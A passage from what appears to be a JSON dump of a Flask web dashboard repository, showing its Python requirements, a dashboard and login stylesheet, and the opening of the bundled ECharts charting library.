  },
  {
    "path": "flask/requirements.txt",
    "content": "Flask_SocketIO==4.3.0\nrequests==2.23.0\nkafka_python==2.0.1\nredis==3.5.0\nflask==1.1.2"
  },
  {
    "path": "flask/static/css/styles.css",
    "content": "body {\n    font-family: 'Open Sans', sans-serif;\n    background-color: #f7f7f7;\n    position: relative;\n    margin: 0px;\n    font-size: 12px;\n    padding: 0px;\n}\n\n.page-content>.row {\n    margin-left: 0px !important;\n    margin-right: 0px !important;\n    margin-top: 30px;\n}\n\n\n/* Footer */\n\nfooter {\n    background-color: #2c3742;\n    box-shadow: inset 0px 0px 3px #111;\n    color: #fff;\n    font-size: 14px;\n    line-height: 25px;\n    padding: 10px 0px 10px 0px;\n    bottom: 0px;\n}\n\nfooter a {\n    color: #eee;\n    text-decoration: none;\n    border-bottom: 1px dotted #888;\n}\n\nfooter a:hover {\n    color: #aaa;\n    text-decoration: none;\n    border: 0px;\n}\n\nfooter hr {\n    margin-top: 10px;\n    margin-bottom: 10px;\n    border-top: #000 1px solid;\n    border-bottom: #212121 1px solid;\n}\n\nfooter .copy {\n    font-size: 13px;\n    margin: 15px 0px;\n}\n\n\n/* Logo & Navigation */\n\n.header {\n    height: 50px;\n    background-color: #2c3742;\n}\n\n.header .logo h1 {\n    font-size: 25px;\n    margin: 0px;\n    padding: 10px 0px;\n}\n\n.header .logo h1 a {\n    color: #fff;\n    font-family: 'PingFangSC-Semibold', sans-serif;\n}\n\n.header .logo h1 a:hover {\n    color: #fff;\n    text-decoration: none;\n    border: 0px;\n}\n\n.header .form {\n    margin-top: 10px;\n    width: 100%;\n    max-width: 300px;\n    margin: 10px auto;\n}\n\n.header .navbar * {\n    box-shadow: none !important;\n}\n\n.header .navbar .label {\n    font-size: 12px;\n    padding: 4px 8px;\n    margin: 0px 2px;\n    border-radius: 15px !important;\n}\n\n.header .navbar {\n    background: none !important;\n    border: 0px !important;\n    font-family: \"PingFangSC-Semibold\"\n}\n\n.header .navbar i {\n    margin-right: 3px;\n}\n\n.header .navbar .nav>li>a {\n    color: #fff !important;\n    font-size: 13px !important;\n    border-bottom: 0px !important;\n    margin-top: 0px !important;\n    font-weight: bold;\n}\n\n.header .navbar-nav>.open>a,\n.header .navbar-nav>.open>a:hover,\n.header .navbar-nav>.open>a:focus {\n    background: none !important;\n}\n\n.header .navbar-collapse {\n    border: 0px !important;\n}\n\n.header .navbar-header {\n    width: 43px;\n    margin: 0 auto;\n}\n\n.header .navbar-header button {\n    color: #fff !important;\n    padding: 5px 10px;\n}\n\n.header .navbar-toggle {\n    background-color: #1dc1da !important;\n    border: 1px solid #0fa6bc !important;\n}\n\n.header .navbar-toggle:hover,\n.header .navbar-toggle:focus {\n    background-color: #0fa6bc !important;\n    border: 1px solid #0fa6bc !important;\n}\n\n.header .dropdown-menu {\n    border-radius: 6px !important;\n    background: #fff !important;\n}\n\n.header .dropdown-menu li {\n    font-size: 13px;\n    padding: 6px 15px;\n    border-bottom: 1px dashed #f3f3f3;\n}\n\n.header .dropdown-menu li a {\n    color: #888;\n    padding-left: 0px !important;\n}\n\n.header .dropdown-menu li:last-child {\n    border: 0px;\n}\n\n.header .dropdown-menu li a:hover {\n    background: none !important;\n    color: #666 !important;\n    border: 0px !important;\n}\n\n.header .dropdown-big {\n    min-width: 300px;\n}\n\n.header .dropdown-big .dropdown-head {\n    padding: 7px 15px;\n    background: #fcfcfc;\n    border-bottom: 1px solid #ddd;\n    margin-top: -5px;\n    border-top-left-radius: 5px;\n    border-top-right-radius: 5px;\n}\n\n.header .dropdown-big .dropdown-title {\n    font-size: 13px;\n    font-weight: bold;\n    color: #999;\n}\n\n.header .dropdown-big .dropdown-body {\n    background: #fff;\n}\n\n.header .dropdown-big .dropdown-foot {\n    padding: 7px 15px;\n    background: #fcfcfc;\n    border-top: 1px solid #ddd;\n    margin-bottom: -5px;\n    border-bottom-left-radius: 5px;\n    border-bottom-right-radius: 5px;\n    font-size: 12px;\n}\n\n.header .dropdown-big .dropdown-foot a {\n    color: #888;\n}\n\n.header .dropdown-big .dropdown-foot a:hover {\n    color: #555;\n    border-bottom: 0px;\n}\n\n.header .navbar-nav .caret {\n    border-top-color: #fff !important;\n    border-bottom-color: #fff !important;\n}\n\n.header .navbar-nav>.open>a .caret,\n.header .navbar-nav>.open>a:hover .caret,\n.header .navbar-nav>.open>a:focus .caret {\n    border-top-color: #fff !important;\n    border-bottom-color: #fff !important;\n}\n\n\n/* Sidebar navigation */\n\n.content-box,\n.content-box-large {\n    margin-bottom: 30px;\n    background: #fff;\n    border-radius: 10px;\n    padding: 10px;\n    border-left: 1px solid #eee;\n    border-top: 1px solid #eee;\n    border-right: 2px solid #eee;\n    border-bottom: 2px solid #eee;\n}\n\n.content-box-large {\n    padding: 20px;\n}\n\n.box-with-header {\n    border-top: none;\n    border-top-left-radius: 0px;\n    border-top-right-radius: 0px;\n}\n\n.content-box-header {\n    min-height: 40px;\n    font-size: 16px;\n    background: #f5f5f5;\n    border-top-left-radius: 5px;\n    border-top-right-radius: 5px;\n    padding: 10px;\n    border-left: 1px solid #eee;\n    border-top: 1px solid #eee;\n    border-right: 2px solid #eee;\n}\n\n.content-box-header:after {\n    clear: both;\n}\n\n.sidebar ul.nav,\n.sidebar ul.nav ul {\n    list-style: none;\n    padding: 0px;\n    margin: 0px;\n}\n\n.sidebar ul.nav ul {\n    margin: 0px;\n    padding: 0px;\n    display: none;\n}\n\n.sidebar .nav li.open ul {\n    display: block;\n}\n\n.sidebar .nav>li {\n    margin: 0;\n    border-bottom: 1px dashed #eee;\n}\n\n.sidebar .nav>li:last-child {\n    border-bottom: 0px;\n}\n\n.sidebar .nav>li li {\n    margin: 0;\n}\n\n.sidebar .nav>li li a {\n    padding-left: 25px;\n}\n\n.sidebar .nav>li>a {\n    font-size: 14px;\n    line-height: 20px;\n    padding: 15px 15px;\n    color: #999;\n    display: block;\n    font-weight: bold;\n    background: none;\n    text-decoration: none;\n    border-top: 0px;\n    font-weight: bold;\n}\n\n.sidebar .nav>li>a>i {\n    margin-right: 5px;\n}\n\n.sidebar .nav>li>ul>li>a {\n    font-size: 13px;\n    line-height: 20px;\n    padding: 8px 10px 8px 40px;\n    color: #999;\n    background: #fff;\n    display: block;\n    text-decoration: none;\n    border-top: 0px;\n    font-weight: bold;\n}\n\n.sidebar .nav>li>ul>li.active>a {\n    background: #fff;\n    border-top: 0px;\n    color: #555;\n}\n\n.sidebar .nav>li>ul>li>a:hover {\n    background: #fff;\n    color: #555;\n    border-bottom: 0px;\n}\n\n.sidebar .nav li a:hover,\n.sidebar .nav li.current>a {\n    background: #fff;\n    color: #555;\n    border-bottom: 0px;\n}\n\n.sidebar .nav li.open>a {\n    background: #fff;\n    color: #555;\n    border-bottom: 1px dashed #eee;\n}\n\n.sidebar .nav a .caret {\n    float: right;\n    width: 0;\n    height: 0;\n    display: inline-block;\n    vertical-align: top;\n    border-top: 4px solid #aaa;\n    border-right: 4px solid transparent;\n    border-left: 4px solid transparent;\n    content: \"\";\n    margin-top: 8px;\n    margin-left: 2px;\n}\n\n.sidebar .nav a:hover .caret {\n    border-top-color: #aaa;\n}\n\n.sidebar .nav li.open>a>.caret {\n    border-top: none;\n    border-bottom: 4px solid #aaa !important;\n    border-right: 4px solid transparent;\n    border-left: 4px solid transparent;\n}\n\n.sidebar .nav li.open>a:hover>.caret {\n    border-bottom-color: #aaa;\n}\n\n.login-bg {\n    background: rgba(255, 255, 255, 0);\n    background: -webkit-linear-gradient(rgba(255, 255, 255, 0.3), rgba(255, 255, 255, 0));\n    background: -moz-linear-gradient(rgba(255, 255, 255, 0.3), rgba(255, 255, 255, 0));\n    background: -ms-linear-gradient(rgba(255, 255, 255, 0.3), rgba(255, 255, 255, 0));\n    background: -o-linear-gradient(rgba(255, 255, 255, 0.3), rgba(255, 255, 255, 0));\n    background: linear-gradient(rgba(255, 255, 255, 0.3), rgba(255, 255, 255, 0));\n    background-color: #eff0f3;\n    background-repeat: no-repeat;\n    height: 100%;\n}\n\nbody {\n    background-color: #eff0f3;\n}\n\n\n/** Login & Signup **/\n\n.login-wrapper {\n    position: absolute;\n    left: 0;\n    right: 0;\n    text-align: center;\n}\n\n.login-wrapper .box {\n    margin: 0 auto;\n    padding: 30px 0 30px;\n    float: none;\n    -webkit-box-shadow: rgba(0, 0, 0, 0.4) 0 1px 3px, rgba(0, 0, 0, 0.35) 0 0 1px;\n    -moz-box-shadow: rgba(0, 0, 0, 0.4) 0 1px 3px, rgba(0, 0, 0, 0.35) 0 0 1px;\n    -ms-box-shadow: rgba(0, 0, 0, 0.4) 0 1px 3px, rgba(0, 0, 0, 0.35) 0 0 1px;\n    -o-box-shadow: rgba(0, 0, 0, 0.4) 0 1px 3px, rgba(0, 0, 0, 0.35) 0 0 1px;\n    box-shadow: rgba(0, 0, 0, 0.4) 0 1px 3px, rgba(0, 0, 0, 0.35) 0 0 1px;\n    background: #fff;\n    -webkit-border-radius: 6px;\n    -moz-border-radius: 6px;\n    -ms-border-radius: 6px;\n    -o-border-radius: 6px;\n    border-radius: 6px;\n}\n\n.login-wrapper .box .content-wrap {\n    width: 82%;\n    margin: 0 auto;\n}\n\n.login-wrapper .box h6 {\n    text-transform: uppercase;\n    margin-bottom: 35px;\n    font-size: 18px;\n    font-weight: 600;\n}\n\n.login-wrapper .box input[type=\"text\"],\n.login-wrapper .box input[type=\"password\"] {\n    font-size: 15px;\n    height: 40px;\n    margin-bottom: 10px;\n    border-color: #b2bfc7;\n    padding-left: 12px;\n}\n\n.login-wrapper .box input[type=\"text\"]:focus,\n.login-wrapper .box input[type=\"password\"]:focus {\n    border: 1px solid #28a0e5;\n    outline: none;\n    -webkit-box-shadow: inset 0 1px 2px #ddd, 0px 0 5px #28a0e5;\n    -moz-box-shadow: inset 0 1px 2px #ddd, 0px 0 5px #28a0e5;\n    -ms-box-shadow: inset 0 1px 2px #ddd, 0px 0 5px #28a0e5;\n    -o-box-shadow: inset 0 1px 2px #ddd, 0px 0 5px #28a0e5;\n    box-shadow: inset 0 1px 2px #dddddd, 0px 0 5px #28a0e5;\n}\n\n.login-wrapper .box input[type=\"password\"] {\n    margin-bottom: 10px;\n}\n\n.login-wrapper .box .action {\n    position: relative;\n    top: 30px;\n    padding: 15px 0px;\n}\n\n.login-wrapper .box .signup {\n    text-transform: uppercase;\n    font-size: 13px;\n    padding: 7px 25px;\n    border-radius: 5px;\n}\n\n.login-wrapper .already {\n    margin: 0 auto;\n    float: none;\n    text-align: center;\n    font-size: 13px;\n    margin-top: 30px;\n}\n\n.login-wrapper .already p {\n    display: inline-block;\n    color: #222;\n}\n\n.login-wrapper .already a {\n    color: #222;\n    margin-left: 7px;\n    border-bottom: 1px solid;\n}\n\n.login-wrapper .already a:hover {\n    text-decoration: none;\n    color: #000;\n    border-bottom-color: #000;\n}\n\n.login-wrapper .box .social {\n    margin: 0 auto;\n    width: 90%;\n}\n\n.login-wrapper .box .social a.face_login {\n    background: #6887c4;\n    background: -moz-linear-gradient(top, #6887c4 0%, #4566a9 100%);\n    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #6887c4), color-stop(100%, #4566a9));\n    background: -webkit-linear-gradient(top, #6887c4 0%, #4566a9 100%);\n    background: -o-linear-gradient(top, #6887c4 0%, #4566a9 100%);\n    background: -ms-linear-gradient(top, #6887c4 0%, #4566a9 100%);\n    background: linear-gradient(to bottom, #6887c4 0%, #4566a9 100%);\n    filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#6887c4', endColorstr='#4566a9', GradientType=0);\n    border: 1px solid #3B4868;\n    border-radius: 3px 3px 3px 3px;\n    display: inline-block;\n    height: 37px;\n    overflow: hidden;\n    width: 99%;\n    text-decoration: none !important;\n}\n\n.login-wrapper .box .social a.face_login:hover {\n    background: #6887c4;\n    background: -moz-linear-gradient(top, #6887c4 0%, #5773AC 100%);\n    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #6887c4), color-stop(100%, #5773AC));\n    background: -webkit-linear-gradient(top, #6887c4 0%, #5773AC 100%);\n    background: -o-linear-gradient(top, #6887c4 0%, #5773AC 100%);\n    background: -ms-linear-gradient(top, #6887c4 0%, #5773AC 100%);\n    background: linear-gradient(to bottom, #6887c4 0%, #5773AC 100%);\n    filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#6887c4', endColorstr='#5773AC', GradientType=0);\n}\n\n.login-wrapper .box .social a.face_login span.face_icon {\n    background-color: #39599F;\n    border-radius: 3px 0 0 3px;\n    float: left;\n    height: 37px;\n    text-align: center;\n    width: 51px;\n}\n\n.login-wrapper .box .social a.face_login span.face_icon img {\n    margin-top: 5px;\n}\n\n.login-wrapper .box .social a.face_login span.text {\n    color: #FFFFFF;\n    float: left;\n    font-size: 15px;\n    font-weight: bold;\n    margin: 6px 0 0 25px;\n    text-shadow: 1px 1px 0 #39599F;\n}\n\n.login-wrapper .box .division {\n    display: inline-block;\n    margin: 17px 0 23px;\n    position: relative;\n    text-align: center;\n    width: 100%;\n}\n\n.login-wrapper .box .division hr {\n    border-color: #E2E2E4;\n    border-width: 1px;\n    margin: 0;\n    position: absolute;\n    width: 40%;\n}\n\n.login-wrapper .box .division hr.left {\n    top: 13px;\n}\n\n.login-wrapper .box .division hr.right {\n    bottom: 6px;\n    right: 0;\n}\n\n.login-wrapper .box .division span {\n    color: #666666;\n    font-size: 18px;\n}\n\n.panel-heading>.panel-title,\n.content-box-header .panel-title {\n    float: left;\n    padding: 10px 15px;\n    padding-top: 0px;\n}\n\n.panel-heading>.panel-title>*,\n.content-box-header .panel-title>* {\n    margin: 0;\n}\n\n.panel-heading>.panel-title>span,\n.content-box-header .panel-title>span {\n    font-weight: normal;\n}\n\n.panel-heading>.panel-options,\n.content-box-header .panel-options {\n    float: right;\n    padding-right: 15px;\n}\n\n.panel-heading>.panel-options>a,\n.content-box-header .panel-options>a {\n    margin-top: 10px;\n}\n\n.panel-body {\n    clear: both;\n}\n\n\n/* Responsive CSS */\n\n\n/* Mobile phones */\n\n@media (max-width: 480px) {}\n\n\n/* Tablets */\n\n@media (max-width: 767px) {\n    .container {\n        width: 100%;\n    }\n    .header {\n        height: auto;\n        padding: 15px 0px;\n    }\n    .header .logo {\n        text-align: center;\n        padding-bottom: 10px;\n    }\n    .header .navbar .nav>li>a:hover {\n        background: #0fa6bc;\n        border-radius: 5px;\n    }\n    .navbar-toggle {\n        margin-right: 0px !important;\n    }\n}\n\n\n/* Desktop */\n\n@media (max-width: 991px) {\n    .header {\n        height: auto;\n        padding: 15px 0px;\n    }\n    .header .logo {\n        text-align: center;\n        padding-bottom: 10px;\n    }\n    .header .form {\n        margin: 10px auto;\n    }\n    .sidebar,\n    content-box {\n        margin-bottom: 30px;\n        width: 100%;\n        float: none;\n        position: relative;\n    }\n    .mainy {\n        margin-left: 0px;\n    }\n    .sidebar-dropdown {\n        display: block;\n        text-align: center;\n        margin: 0 auto;\n        margin-bottom: 10px;\n        border-bottom: 1px dashed #eee;\n        padding-bottom: 10px;\n    }\n    .sidebar-dropdown a,\n    .sidebar-dropdown a:hover {\n        color: #fff;\n        background: #16cbe6;\n        display: block;\n        padding: 6px 12px;\n        border-bottom: 0px;\n        box-shadow: 0px 0px 1px #0fa6bc;\n        border-radius: 10px;\n    }\n}"
  },
  {
    "path": "flask/static/js/echarts/echarts.js",
    "content": "(function (global, factory) {\n\ttypeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :\n\ttypeof define === 'function' && define.amd ? define(['exports'], factory) :\n\t(factory((global.echarts = {})));\n}(this, (function (exports) { 'use strict';\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// (1) The code `if (__DEV__) ...` can be removed by build tool.\n// (2) If intend to use `__DEV__`, this module should be imported. Use a global\n// variable `__DEV__` may cause that miss the declaration (see #6535), or the\n// declaration is behind of the using position (for example in `Model.extent`,\n// And tools like rollup can not analysis the dependency if not import).\n\nvar dev;\n\n// In browser\nif (typeof window !== 'undefined') {\n    dev = window.__DEV__;\n}\n// In node\nelse if (typeof global !== 'undefined') {\n    dev = global.__DEV__;\n}\n\nif (typeof dev === 'undefined') {\n    dev = true;\n}\n\nvar __DEV__ = dev;\n\n/**\n * zrender: 生成唯一id\n *\n * @author errorrik (errorrik@gmail.com)\n */\n\nvar idStart = 0x0907;\n\nvar guid = function () {\n    return idStart++;\n};\n\n/**\n * echarts设备环境识别\n *\n * @desc echarts基于Canvas，纯Javascript图表库，提供直观，生动，可交互，可个性化定制的数据统计图表。\n * @author firede[firede@firede.us]\n * @desc thanks zepto.\n */\n\n/* global wx */\n\nvar env = {};\n\nif (typeof wx === 'object' && typeof wx.getSystemInfoSync === 'function') {\n    // In Weixin Application\n    env = {\n        browser: {},\n        os: {},\n        node: false,\n        wxa: true, // Weixin Application\n        canvasSupported: true,\n        svgSupported: false,\n        touchEventsSupported: true,\n        domSupported: false\n    };\n}\nelse if (typeof document === 'undefined' && typeof self !== 'undefined') {\n    // In worker\n    env = {\n        browser: {},\n        os: {},\n        node: false,\n        worker: true,\n        canvasSupported: true,\n        domSupported: false\n    };\n}\nelse if (typeof navigator === 'undefined') {\n    // In node\n    env = {\n        browser: {},\n        os: {},\n        node: true,\n        worker: false,\n        // Assume canvas is supported\n        canvasSupported: true,\n        svgSupported: true,\n        domSupported: false\n    };\n}\nelse {\n    env = detect(navigator.userAgent);\n}\n\nvar env$1 = env;\n\n// Zepto.js\n// (c) 2010-2013 Thomas Fuchs\n// Zepto.js may be freely distributed under the MIT license.\n\nfunction detect(ua) {\n    var os = {};\n    var browser = {};\n    // var webkit = ua.match(/Web[kK]it[\\/]{0,1}([\\d.]+)/);\n    // var android = ua.match(/(Android);?[\\s\\/]+([\\d.]+)?/);\n    // var ipad = ua.match(/(iPad).*OS\\s([\\d_]+)/);\n    // var ipod = ua.match(/(iPod)(.*OS\\s([\\d_]+))?/);\n    // var iphone = !ipad && ua.match(/(iPhone\\sOS)\\s([\\d_]+)/);\n    // var webos = ua.match(/(webOS|hpwOS)[\\s\\/]([\\d.]+)/);\n    // var touchpad = webos && ua.match(/TouchPad/);\n    // var kindle = ua.match(/Kindle\\/([\\d.]+)/);\n    // var silk = ua.match(/Silk\\/([\\d._]+)/);\n    // var blackberry = ua.match(/(BlackBerry).*Version\\/([\\d.]+)/);\n    // var bb10 = ua.match(/(BB10).*Version\\/([\\d.]+)/);\n    // var rimtabletos = ua.match(/(RIM\\sTablet\\sOS)\\s([\\d.]+)/);\n    // var playbook = ua.match(/PlayBook/);\n    // var chrome = ua.match(/Chrome\\/([\\d.]+)/) || ua.match(/CriOS\\/([\\d.]+)/);\n    var firefox = ua.match(/Firefox\\/([\\d.]+)/);\n    // var safari = webkit && ua.match(/Mobile\\//) && !chrome;\n    // var webview = ua.match(/(iPhone|iPod|iPad).*AppleWebKit(?!.*Safari)/) && !chrome;\n    var ie = ua.match(/MSIE\\s([\\d.]+)/)\n        // IE 11 Trident/7.0; rv:11.0\n        || ua.match(/Trident\\/.+?rv:(([\\d.]+))/);\n    var edge = ua.match(/Edge\\/([\\d.]+)/); // IE 12 and 12+\n\n    var weChat = (/micromessenger/i).test(ua);\n\n    // Todo: clean this up with a better OS/browser seperation:\n    // - discern (more) between multiple browsers on android\n    // - decide if kindle fire in silk mode is android or not\n    // - Firefox on Android doesn't specify the Android version\n    // - possibly devide in os, device and browser hashes\n\n    // if (browser.webkit = !!webkit) browser.version = webkit[1];\n\n    // if (android) os.android = true, os.version = android[2];\n    // if (iphone && !ipod) os.ios = os.iphone = true, os.version = iphone[2].replace(/_/g, '.');\n    // if (ipad) os.ios = os.ipad = true, os.version = ipad[2].replace(/_/g, '.');\n    // if (ipod) os.ios = os.ipod = true, os.version = ipod[3] ? ipod[3].replace(/_/g, '.') : null;\n    // if (webos) os.webos = true, os.version = webos[2];\n    // if (touchpad) os.touchpad = true;\n    // if (blackberry) os.blackberry = true, os.version = blackberry[2];\n    // if (bb10) os.bb10 = true, os.version = bb10[2];\n    // if (rimtabletos) os.rimtabletos = true, os.version = rimtabletos[2];\n    // if (playbook) browser.playbook = true;\n    // if (kindle) os.kindle = true, os.version = kindle[1];\n    // if (silk) browser.silk = true, browser.version = silk[1];\n    // if (!silk && os.android && ua.match(/Kindle Fire/)) browser.silk = true;\n    // if (chrome) browser.chrome = true, browser.version = chrome[1];\n    if (firefox) {\n        browser.firefox = true;\n        browser.version = firefox[1];\n    }\n    // if (safari && (ua.match(/Safari/) || !!os.ios)) browser.safari = true;\n    // if (webview) browser.webview = true;\n\n    if (ie) {\n        browser.ie = true;\n        browser.version = ie[1];\n    }\n\n    if (edge) {\n        browser.edge = true;\n        browser.version = edge[1];\n    }\n\n    // It is difficult to detect WeChat in Win Phone precisely, because ua can\n    // not be set on win phone. So we do not consider Win Phone.\n    if (weChat) {\n        browser.weChat = true;\n    }\n\n    // os.tablet = !!(ipad || playbook || (android && !ua.match(/Mobile/)) ||\n    //     (firefox && ua.match(/Tablet/)) || (ie && !ua.match(/Phone/) && ua.match(/Touch/)));\n    // os.phone  = !!(!os.tablet && !os.ipod && (android || iphone || webos ||\n    //     (chrome && ua.match(/Android/)) || (chrome && ua.match(/CriOS\\/([\\d.]+)/)) ||\n    //     (firefox && ua.match(/Mobile/)) || (ie && ua.match(/Touch/))));\n\n    return {\n        browser: browser,\n        os: os,\n        node: false,\n        // 原生canvas支持，改极端点了\n        // canvasSupported : !(browser.ie && parseFloat(browser.version) < 9)\n        canvasSupported: !!document.createElement('canvas').getContext,\n        svgSupported: typeof SVGRect !== 'undefined',\n        // works on most browsers\n        // IE10/11 does not support touch event, and MS Edge supports them but not by\n        // default, so we dont check navigator.maxTouchPoints for them here.\n        touchEventsSupported: 'ontouchstart' in window && !browser.ie && !browser.edge,\n        // <http://caniuse.com/#search=pointer%20event>.\n        pointerEventsSupported:\n            // (1) Firefox supports pointer but not by default, only MS browsers are reliable on pointer\n            // events currently. So we dont use that on other browsers unless tested sufficiently.\n            // For example, in iOS 13 Mobile Chromium 78, if the touching behavior starts page\n            // scroll, the `pointermove` event can not be fired any more. That will break some\n            // features like \"pan horizontally to move something and pan vertically to page scroll\".\n            // The horizontal pan probably be interrupted by the casually triggered page scroll.\n            // (2) Although IE 10 supports pointer event, it use old style and is different from the\n            // standard. So we exclude that. (IE 10 is hardly used on touch device)\n            'onpointerdown' in window\n                && (browser.edge || (browser.ie && browser.version >= 11)),\n        // passiveSupported: detectPassiveSupport()\n        domSupported: typeof document !== 'undefined'\n    };\n}\n\n// See https://github.com/WICG/EventListenerOptions/blob/gh-pages/explainer.md#feature-detection\n// function detectPassiveSupport() {\n//     // Test via a getter in the options object to see if the passive property is accessed\n//     var supportsPassive = false;\n//     try {\n//         var opts = Object.defineProperty({}, 'passive', {\n//             get: function() {\n//                 supportsPassive = true;\n//             }\n//         });\n//         window.addEventListener('testPassive', function() {}, opts);\n//     } catch (e) {\n//     }\n//     return supportsPassive;\n// }\n\n/**\n * @module zrender/core/util\n */\n\n// 用于处理merge时无法遍历Date等对象的问题\nvar BUILTIN_OBJECT = {\n    '[object Function]': 1,\n    '[object RegExp]': 1,\n    '[object Date]': 1,\n    '[object Error]': 1,\n    '[object CanvasGradient]': 1,\n    '[object CanvasPattern]': 1,\n    // For node-canvas\n    '[object Image]': 1,\n    '[object Canvas]': 1\n};\n\nvar TYPED_ARRAY = {\n    '[object Int8Array]': 1,\n    '[object Uint8Array]': 1,\n    '[object Uint8ClampedArray]': 1,\n    '[object Int16Array]': 1,\n    '[object Uint16Array]': 1,\n    '[object Int32Array]': 1,\n    '[object Uint32Array]': 1,\n    '[object Float32Array]': 1,\n    '[object Float64Array]': 1\n};\n\nvar objToString = Object.prototype.toString;\n\nvar arrayProto = Array.prototype;\nvar nativeForEach = arrayProto.forEach;\nvar nativeFilter = arrayProto.filter;\nvar nativeSlice = arrayProto.slice;\nvar nativeMap = arrayProto.map;\nvar nativeReduce = arrayProto.reduce;\n\n// Avoid assign to an exported variable, for transforming to cjs.\nvar methods = {};\n\nfunction $override(name, fn) {\n    // Clear ctx instance for different environment\n    if (name === 'createCanvas') {\n        _ctx = null;\n    }\n\n    methods[name] = fn;\n}\n\n/**\n * Those data types can be cloned:\n *     Plain object, Array, TypedArray, number, string, null, undefined.\n * Those data types will be assgined using the orginal data:\n *     BUILTIN_OBJECT\n * Instance of user defined class will be cloned to a plain object, without\n * properties in prototype.\n * Other data types is not supported (not sure what will happen).\n *\n * Caution: do not support clone Date, for performance consideration.\n * (There might be a large number of date in `series.data`).\n * So date should not be modified in and out of echarts.\n *\n * @param {*} source\n * @return {*} new\n */\nfunction clone(source) {\n    if (source == null || typeof source !== 'object') {\n        return source;\n    }\n\n    var result = source;\n    var typeStr = objToString.call(source);\n\n    if (typeStr === '[object Array]') {\n        if (!isPrimitive(source)) {\n            result = [];\n            for (var i = 0, len = source.length; i < len; i++) {\n                result[i] = clone(source[i]);\n            }\n        }\n    }\n    else if (TYPED_ARRAY[typeStr]) {\n        if (!isPrimitive(source)) {\n            var Ctor = source.constructor;\n            if (source.constructor.from) {\n                result = Ctor.from(source);\n            }\n            else {\n                result = new Ctor(source.length);\n                for (var i = 0, len = source.length; i < len; i++) {\n                    result[i] = clone(source[i]);\n                }\n            }\n        }\n    }\n    else if (!BUILTIN_OBJECT[typeStr] && !isPrimitive(source) && !isDom(source)) {\n        result = {};\n        for (var key in source) {\n            if (source.hasOwnProperty(key)) {\n                result[key] = clone(source[key]);\n            }\n        }\n    }\n\n    return result;\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} target\n * @param {*} source\n * @param {boolean} [overwrite=false]\n */\nfunction merge(target, source, overwrite) {\n    // We should escapse that source is string\n    // and enter for ... in ...\n    if (!isObject$1(source) || !isObject$1(target)) {\n        return overwrite ? clone(source) : target;\n    }\n\n    for (var key in source) {\n        if (source.hasOwnProperty(key)) {\n            var targetProp = target[key];\n            var sourceProp = source[key];\n\n            if (isObject$1(sourceProp)\n                && isObject$1(targetProp)\n                && !isArray(sourceProp)\n                && !isArray(targetProp)\n                && !isDom(sourceProp)\n                && !isDom(targetProp)\n                && !isBuiltInObject(sourceProp)\n                && !isBuiltInObject(targetProp)\n                && !isPrimitive(sourceProp)\n                && !isPrimitive(targetProp)\n            ) {\n                // 如果需要递归覆盖，就递归调用merge\n                merge(targetProp, sourceProp, overwrite);\n            }\n            else if (overwrite || !(key in target)) {\n                // 否则只处理overwrite为true，或者在目标对象中没有此属性的情况\n                // NOTE，在 target[key] 不存在的时候也是直接覆盖\n                target[key] = clone(source[key], true);\n            }\n        }\n    }\n\n    return target;\n}\n\n/**\n * @param {Array} targetAndSources The first item is target, and the rests are source.\n * @param {boolean} [overwrite=false]\n * @return {*} target\n */\nfunction mergeAll(targetAndSources, overwrite) {\n    var result = targetAndSources[0];\n    for (var i = 1, len = targetAndSources.length; i < len; i++) {\n        result = merge(result, targetAndSources[i], overwrite);\n    }\n    return result;\n}\n\n/**\n * @param {*} target\n * @param {*} source\n * @memberOf module:zrender/core/util\n */\nfunction extend(target, source) {\n    for (var key in source) {\n        if (source.hasOwnProperty(key)) {\n            target[key] = source[key];\n        }\n    }\n    return target;\n}\n\n/**\n * @param {*} target\n * @param {*} source\n * @param {boolean} [overlay=false]\n * @memberOf module:zrender/core/util\n */\nfunction defaults(target, source, overlay) {\n    for (var key in source) {\n        if (source.hasOwnProperty(key)\n            && (overlay ? source[key] != null : target[key] == null)\n        ) {\n            target[key] = source[key];\n        }\n    }\n    return target;\n}\n\nvar createCanvas = function () {\n    return methods.createCanvas();\n};\n\nmethods.createCanvas = function () {\n    return document.createElement('canvas');\n};\n\n// FIXME\nvar _ctx;\n\nfunction getContext() {\n    if (!_ctx) {\n        // Use util.createCanvas instead of createCanvas\n        // because createCanvas may be overwritten in different environment\n        _ctx = createCanvas().getContext('2d');\n    }\n    return _ctx;\n}\n\n/**\n * 查询数组中元素的index\n * @memberOf module:zrender/core/util\n */\nfunction indexOf(array, value) {\n    if (array) {\n        if (array.indexOf) {\n            return array.indexOf(value);\n        }\n        for (var i = 0, len = array.length; i < len; i++) {\n            if (array[i] === value) {\n                return i;\n            }\n        }\n    }\n    return -1;\n}\n\n/**\n * 构造类继承关系\n *\n * @memberOf module:zrender/core/util\n * @param {Function} clazz 源类\n * @param {Function} baseClazz 基类\n */\nfunction inherits(clazz, baseClazz) {\n    var clazzPrototype = clazz.prototype;\n    function F() {}\n    F.prototype = baseClazz.prototype;\n    clazz.prototype = new F();\n\n    for (var prop in clazzPrototype) {\n        if (clazzPrototype.hasOwnProperty(prop)) {\n            clazz.prototype[prop] = clazzPrototype[prop];\n        }\n    }\n    clazz.prototype.constructor = clazz;\n    clazz.superClass = baseClazz;\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Object|Function} target\n * @param {Object|Function} sorce\n * @param {boolean} overlay\n */\nfunction mixin(target, source, overlay) {\n    target = 'prototype' in target ? target.prototype : target;\n    source = 'prototype' in source ? source.prototype : source;\n\n    defaults(target, source, overlay);\n}\n\n/**\n * Consider typed array.\n * @param {Array|TypedArray} data\n */\nfunction isArrayLike(data) {\n    if (!data) {\n        return;\n    }\n    if 